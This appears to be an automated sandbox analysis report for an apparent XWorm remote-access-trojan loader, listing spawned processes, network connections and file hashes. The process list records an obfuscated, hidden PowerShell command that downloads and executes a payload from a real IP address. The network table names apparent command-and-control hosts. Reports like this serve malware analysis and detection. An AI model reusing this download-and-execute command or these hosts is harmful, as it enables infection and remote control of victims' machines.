C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6340 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8492 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6736 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8648 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,452737980333824178,11206437209933937156,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7zO04CA372E\XWormLoader 5.1 x64.exe
"C:\Users\Admin\AppData\Local\Temp\7zO04CA372E\XWormLoader 5.1 x64.exe"
C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE
"C:\Users\Admin\AppData\Local\Temp\CONSOLEAPP1.EXE"
C:\Users\Admin\AppData\Local\Temp\NEW.EXE
"C:\Users\Admin\AppData\Local\Temp\NEW.EXE"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_XWorm.V5.2.zip\XWorm.V5.2.rar"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xexxru.bat" "
C:\Windows\SysWOW64\cmd.exe
CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$25D01E91C5099F12D5C4ADC8073538D37E16C2199CF5D34DB9F8AE2C5D89D068AA2683AD353D3967F2B9B88B5894BD05B79E7243F3811BC6FC8A20188D5AE02471EE7DF69531E65E9B7EC50FE980B10E43E55D93F3DE128A08C39ABDD282EE95C82174D5='IEX(NEW-OBJECT NET.W';$A55666DE73B6BFF12C8DB3E5D0E9B44E9DEE7B0E24A70B140DF28B821CE8E128374DD4D0F694BE49A497C7AB5EF4DB22D3A62D388F46C082AAD18E298EF1CE5D0E83A9E8EC2E71402F86482732CD40D8E0A9ADBD1535732815FDFDFAA9CA8149494A6EBE='EBCLIENT).DOWNLO';[BYTE[]];$723612B9EDEAF84A7D6C498150302EEE81F63388631D29EDE055DF882B3E35B65604B6B6BBBF559D5BD7231BE09CAE4350359E2369BBA61A7C82D6FE3FE2C88C44455A8B22CCD3810ED99949B9789646BB67975381BAFD6CD0E53719AF56F74C58562598='13ABC6DFDF7CE8EC5DB5A033E99C577ECEC6B91E88EAF4BDF63B18038D711235CA42AD4EB4E1C1F8F681FE1336CFE10DF37B8719F0DD659A8CD6DDC8C1F9A26C92094D3772A443D6E8C81C78BD04451BA2CA8C42DA6FFDD55443297F46E73DF313138752(''http://146.103.11.88:222/8X.jpg'')'.REPLACE('13ABC6DFDF7CE8EC5DB5A033E99C577ECEC6B91E88EAF4BDF63B18038D711235CA42AD4EB4E1C1F8F681FE1336CFE10DF37B8719F0DD659A8CD6DDC8C1F9A26C92094D3772A443D6E8C81C78BD04451BA2CA8C42DA6FFDD55443297F46E73DF313138752','ADSTRING');[BYTE[]];IEX($25D01E91C5099F12D5C4ADC8073538D37E16C2199CF5D34DB9F8AE2C5D89D068AA2683AD353D3967F2B9B88B5894BD05B79E7243F3811BC6FC8A20188D5AE02471EE7DF69531E65E9B7EC50FE980B10E43E55D93F3DE128A08C39ABDD282EE95C82174D5+$A55666DE73B6BFF12C8DB3E5D0E9B44E9DEE7B0E24A70B140DF28B821CE8E128374DD4D0F694BE49A497C7AB5EF4DB22D3A62D388F46C082AAD18E298EF1CE5D0E83A9E8EC2E71402F86482732CD40D8E0A9ADBD1535732815FDFDFAA9CA8149494A6EBE+$723612B9EDEAF84A7D6C498150302EEE81F63388631D29EDE055DF882B3E35B65604B6B6BBBF559D5BD7231BE09CAE4350359E2369BBA61A7C82D6FE3FE2C88C44455A8B22CCD3810ED99949B9789646BB67975381BAFD6CD0E53719AF56F74C58562598)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE[]];$25D01E91C5099F12D5C4ADC8073538D37E16C2199CF5D34DB9F8AE2C5D89D068AA2683AD353D3967F2B9B88B5894BD05B79E7243F3811BC6FC8A20188D5AE02471EE7DF69531E65E9B7EC50FE980B10E43E55D93F3DE128A08C39ABDD282EE95C82174D5='IEX(NEW-OBJECT NET.W';$A55666DE73B6BFF12C8DB3E5D0E9B44E9DEE7B0E24A70B140DF28B821CE8E128374DD4D0F694BE49A497C7AB5EF4DB22D3A62D388F46C082AAD18E298EF1CE5D0E83A9E8EC2E71402F86482732CD40D8E0A9ADBD1535732815FDFDFAA9CA8149494A6EBE='EBCLIENT).DOWNLO';[BYTE[]];$723612B9EDEAF84A7D6C498150302EEE81F63388631D29EDE055DF882B3E35B65604B6B6BBBF559D5BD7231BE09CAE4350359E2369BBA61A7C82D6FE3FE2C88C44455A8B22CCD3810ED99949B9789646BB67975381BAFD6CD0E53719AF56F74C58562598='13ABC6DFDF7CE8EC5DB5A033E99C577ECEC6B91E88EAF4BDF63B18038D711235CA42AD4EB4E1C1F8F681FE1336CFE10DF37B8719F0DD659A8CD6DDC8C1F9A26C92094D3772A443D6E8C81C78BD04451BA2CA8C42DA6FFDD55443297F46E73DF313138752(''http://146.103.11.88:222/8X.jpg'')'.REPLACE('13ABC6DFDF7CE8EC5DB5A033E99C577ECEC6B91E88EAF4BDF63B18038D711235CA42AD4EB4E1C1F8F681FE1336CFE10DF37B8719F0DD659A8CD6DDC8C1F9A26C92094D3772A443D6E8C81C78BD04451BA2CA8C42DA6FFDD55443297F46E73DF313138752','ADSTRING');[BYTE[]];IEX($25D01E91C5099F12D5C4ADC8073538D37E16C2199CF5D34DB9F8AE2C5D89D068AA2683AD353D3967F2B9B88B5894BD05B79E7243F3811BC6FC8A20188D5AE02471EE7DF69531E65E9B7EC50FE980B10E43E55D93F3DE128A08C39ABDD282EE95C82174D5+$A55666DE73B6BFF12C8DB3E5D0E9B44E9DEE7B0E24A70B140DF28B821CE8E128374DD4D0F694BE49A497C7AB5EF4DB22D3A62D388F46C082AAD18E298EF1CE5D0E83A9E8EC2E71402F86482732CD40D8E0A9ADBD1535732815FDFDFAA9CA8149494A6EBE+$723612B9EDEAF84A7D6C498150302EEE81F63388631D29EDE055DF882B3E35B65604B6B6BBBF559D5BD7231BE09CAE4350359E2369BBA61A7C82D6FE3FE2C88C44455A8B22CCD3810ED99949B9789646BB67975381BAFD6CD0E53719AF56F74C58562598)
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| BE | 88.221.83.185:443 | www.bing.com | tcp |
| BE | 88.221.83.224:443 | www.bing.com | tcp |
| BE | 88.221.83.224:443 | www.bing.com | tcp |
| BE | 2.17.107.121:443 | th.bing.com | tcp |
| BE | 2.17.107.121:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 2.17.251.5:443 | aefd.nelreports.net | tcp |
| US | 2.17.251.5:443 | aefd.nelreports.net | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| BE | 2.17.107.99:443 | sydney.bing.com | tcp |
| US | 104.18.0.137:443 | static.cracked.io | tcp |
| US | 104.18.0.137:443 | static.cracked.io | tcp |
| US | 8.8.8.8:53 | external-content.duckduckgo.com | udp |
| IE | 52.142.125.222:443 | external-content.duckduckgo.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.26.3.183:443 | static.cracked.to | tcp |
| US | 104.26.3.183:443 | static.cracked.to | tcp |
| US | 104.26.3.183:443 | static.cracked.to | tcp |
| US | 8.8.8.8:53 | 222.125.142.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.3.26.104.in-addr.arpa | udp |
| BE | 23.14.90.91:80 | apps.identrust.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 52.111.227.14:443 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 51.195.251.9:7707 | xfreddy2751.duckdns.org | tcp |
| US | 146.103.11.88:8808 | darkstorm275991.ddns.net | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| BE | 88.221.83.200:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| BE | 88.221.83.200:443 | r.bing.com | tcp |
| BE | 88.221.83.200:443 | r.bing.com | tcp |
| BE | 2.17.107.98:443 | r.bing.com | tcp |
| BE | 2.17.107.98:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 200.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| IE | 20.190.159.4:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | sydney.bing.com | udp |
| BE | 88.221.83.186:443 | sydney.bing.com | tcp |
| US | 8.8.8.8:53 | 186.83.221.88.in-addr.arpa | udp |
| BE | 88.221.83.200:443 | r.bing.com | tcp |
| BE | 2.17.107.98:443 | r.bing.com | tcp |
| BE | 2.17.107.98:443 | r.bing.com | tcp |
| BE | 88.221.83.200:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 2.17.251.5:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | system32.ink | udp |
| SG | 191.101.228.241:443 | system32.ink | tcp |
| SG | 191.101.228.241:443 | system32.ink | tcp |
| SG | 191.101.228.241:443 | system32.ink | tcp |
| US | 8.8.8.8:53 | 241.228.101.191.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fonts.cdnfonts.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 172.64.132.22:443 | fonts.cdnfonts.com | tcp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | tcp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | udp |
| FR | 143.244.56.51:443 | live-tag.creatopy.net | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | tcp |
| US | 8.8.8.8:53 | live-tag.creatopy.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 51.56.244.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.178.250.142.in-addr.arpa | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 142.250.200.46:443 | syndicatedsearch.goog | tcp |
| US | 8.8.8.8:53 | syndicatedsearch.goog | udp |
| GB | 172.217.16.226:443 | partner.googleadservices.com | tcp |
| GB | 142.250.200.46:443 | syndicatedsearch.goog | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | cse.google.com | tcp |
| US | 8.8.8.8:53 | www.adsensecustomsearchads.com | udp |
| GB | 172.217.16.238:443 | www.adsensecustomsearchads.com | tcp |
| GB | 142.250.187.206:443 | cse.google.com | udp |
| US | 8.8.8.8:53 | clients1.google.com | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| BE | 2.17.107.106:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 106.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1877.to | udp |
| NL | 185.11.145.145:443 | 1877.to | tcp |
| NL | 185.11.145.145:443 | 1877.to | tcp |
| NL | 185.11.145.145:443 | 1877.to | tcp |
| NL | 185.11.145.145:443 | 1877.to | tcp |
| NL | 185.11.145.145:443 | 1877.to | tcp |
| NL | 185.11.145.145:443 | 1877.to | tcp |
| US | 8.8.8.8:53 | l2dwidget.js.org | udp |
| US | 8.8.8.8:53 | i.imgur.com | udp |
| GB | 146.75.72.193:443 | i.imgur.com | tcp |
| GB | 146.75.72.193:443 | i.imgur.com | tcp |
| US | 172.67.73.64:443 | l2dwidget.js.org | tcp |
| US | 8.8.8.8:53 | 193.72.75.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.145.11.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.73.67.172.in-addr.arpa | udp |
| GB | 142.250.200.33:443 | blogger.googleusercontent.com | tcp |
| US | 104.26.11.228:443 | level23hacktools.com | tcp |
| US | 104.26.11.228:443 | level23hacktools.com | tcp |
| US | 8.8.8.8:53 | use.fontawesome.com | udp |
| US | 8.8.8.8:53 | i.postimg.cc | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| US | 172.64.207.38:443 | use.fontawesome.com | tcp |
| US | 172.64.207.38:443 | use.fontawesome.com | tcp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| FR | 162.19.88.68:443 | i.postimg.cc | tcp |
| FR | 162.19.58.157:443 | i.ibb.co | tcp |
| FR | 162.19.58.157:443 | i.ibb.co | tcp |
| FR | 162.19.58.157:443 | i.ibb.co | tcp |
| FR | 162.19.58.157:443 | i.ibb.co | tcp |
| US | 172.64.207.38:443 | use.fontawesome.com | tcp |
| US | 8.8.8.8:53 | code.jquery.com | udp |
| US | 151.101.2.137:443 | code.jquery.com | tcp |
| US | 104.26.11.228:443 | level23hacktools.com | tcp |
| US | 8.8.8.8:53 | 228.11.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.207.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.88.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.58.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.2.101.151.in-addr.arpa | udp |
| US | 216.239.34.181:443 | analytics.google.com | tcp |
| BE | 64.233.166.156:443 | stats.g.doubleclick.net | tcp |
| BE | 64.233.166.156:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 156.166.233.64.in-addr.arpa | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| US | 104.18.1.146:443 | cdn.sellix.io | tcp |
| US | 216.239.34.181:443 | analytics.google.com | udp |
| US | 146.103.11.88:8808 | darkstorm275991.ddns.net | tcp |
| US | 146.103.11.88:222 | darkstorm275991.ddns.net | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ec7568123e3bee98a389e115698dffeb |
| SHA1 | 1542627dbcbaf7d93fcadb771191f18c2248238c |
| SHA256 | 5b5e61fe004e83477411dd2b6194e90591d36f2f145cc3b4faa20cf7ae266a75 |
| SHA512 | 4a53fbbd7281a1a391f0040f6ff5515cedf6e1f97f2dae4ab495b4f76eb4f929dcda6b347f9bf7f66a899330f8897e1ed117314945d1de27b035cc170fa447d3 |
\??\pipe\LOCAL\crashpad_3756_WCYDBHZFHCIOUONW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 120efec42955d45d29cd2d9add1e05ca |
| SHA1 | 44d91a40b60b125fb17f9fe4896d7baec7ccfe9d |
| SHA256 | 59dfaf754fcca337f80a2d0c3a84f9b64d853aaa47a443baabfee8405152ccfd |
| SHA512 | 08e313c1d75af44fd16477220a065b893caa08305150f8537d6b104bfbbb2b742bc34488cc0e68d2a5ff05d1ecf092318cda7e7b8821c57e801696e05bc526cf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 16ac17eda0c91f851dfd6c2480fbe858 |
| SHA1 | b8160bfd0874a0dc561b190386af57b4611973d3 |
| SHA256 | 0b971040c41e00bcae8f161b3d505bb6ff7875cc966cbdfcfee2c4433fde672a |
| SHA512 | 9d1e1a1021132398ff630f2288c0ea705550bb95f0ac7af755a06f8db6fdebe548e1be47d496529af8e5e223524022b5c84ea6e15d53fcdd07206ed286ce1a00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 30307d9df966bee96e83ab549c04ead6 |
| SHA1 | 51e2c126dd112d1b45d28723ea1a39933ebb1540 |
| SHA256 | 5c73704d62e7d3dad91d62e3841dd1be469c62a88a8a2ff1b4ae7763807479e7 |
